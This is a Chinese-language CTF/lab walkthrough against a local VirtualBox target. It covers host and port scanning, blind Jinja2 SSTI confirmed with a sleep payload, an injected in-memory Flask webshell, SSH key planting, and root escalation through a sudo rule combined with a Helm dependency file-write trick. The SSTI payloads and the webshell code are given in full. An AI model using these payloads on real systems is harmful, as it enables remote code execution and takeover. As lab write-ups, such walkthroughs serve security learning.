主机发现

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop]
└─$ sudo arp-scan -I eth1 192.168.56.1/24
[sudo] password for kali: 
Interface: eth1, type: EN10MB, MAC: 00:0c:29:34:da:f5, IPv4: 192.168.56.103
WARNING: host part of 192.168.56.1/24 is non-zero
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1    0a:00:27:00:00:03       (Unknown: locally administered)
192.168.56.100  08:00:27:49:5f:2a       PCS Systemtechnik GmbH
192.168.56.145  08:00:27:fc:77:b2       PCS Systemtechnik GmbH

3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 2.391 seconds (107.07 hosts/sec). 3 responded

端口扫描

1
2
3
4
5
6
7
8
9
10
11
12
┌──(kali㉿kali)-[~/Desktop]
└─$ nmap -p- 192.168.56.145 
Starting Nmap 7.95 ( https://nmap.org ) at 2025-11-19 05:00 EST
Nmap scan report for 192.168.56.145
Host is up (0.0030s latency).
Not shown: 65533 filtered tcp ports (no-response)
PORT     STATE SERVICE
22/tcp   open  ssh
8080/tcp open  http-proxy
MAC Address: 08:00:27:FC:77:B2 (PCS Systemtechnik/Oracle VirtualBox virtual NIC)

Nmap done: 1 IP address (1 host up) scanned in 107.50 seconds

web

8080端口是一个管理系统登录框, 无论输入什么账户/密码都能够成功登录且会会显出用户名

image-20251119180421554

想用{{7*7}}测一下是否有SSTI模板注入漏洞,根据表面结果来看是没有的

image-20251119180613123

正当我没什么其他办法的时候,我打了这个一个SSTI payload {{url_for.__globals__['__builtins__']['eval']("__import__('os').popen('sleep%205').read()")}}

页面确实正常返回了,但也是存在延时

image-20251119180809278

那就是存在SSTI模板注入漏洞只是没回显

打一个内存马

1
{{ ''.__class__.__mro__[-1].__subclasses__()[abking].__init__.__globals__['__builtins__']['eval']("__import__('sys').modules['__main__'].__dict__['app'].before_request_funcs.setdefault(None, []).append(lambda: CmdResp if __import__('sys').modules['__main__'].__dict__['request'].args.get('abking') and exec(\"global CmdResp;CmdResp=__import__(\'flask\').make_response(__import__(\'os\').popen(__import__('sys').modules['__main__'].__dict__['request'].args.get(\'abking\')).read())\")==None else None)") }}

image-20251119180924618

然后就可以命令执行 eecho用户

image-20251119181018947

然后我写一个公钥进去 ,ssh登上了eecho用户的账户

image-20251119181109109

提权

eecho用户家目录下有一个带有s权限game 文件,貌似只是一个游戏文件?

image-20251119181208274

寻找其他带有s权限的文件

image-20251119181341805

helm有这个权限

然后sudo -l 发现我们有(ALL) NOPASSWD: /bin/bash /opt/data

image-20251119181431079

那么思路就很明确了

先输掉game游戏 清空/opt/data文件

然后用前端时间helm的那个文件写入漏洞把恶意命令写入到/opt/data

最后再sudo /bin/bash /opt/data

不过由于靶机不能访问外网。不能直接用GitHub上面的poc

这里采用本地仓库的办法

先在本地执行helm dependency update

然后会在charts/目录下生成一个gatekeeper-3.19.2.tgz文件

image-20251119182142412

把这个文件拿到靶机上面

image-20251119182241122

image-20251119182403953

然后创建Chart.yaml

image-20251119182645152

然后把Chart.lock连接到/opt/data

image-20251119182755385

然后运行game 故意输掉游戏 清空/opt/data

刚才忘记改repository 这时候改一下

image-20251119182957165

清空之后运行helm dependency build

image-20251119183025833

然后执行sudo /bin/bash /opt/data 就行了

image-20251119183213574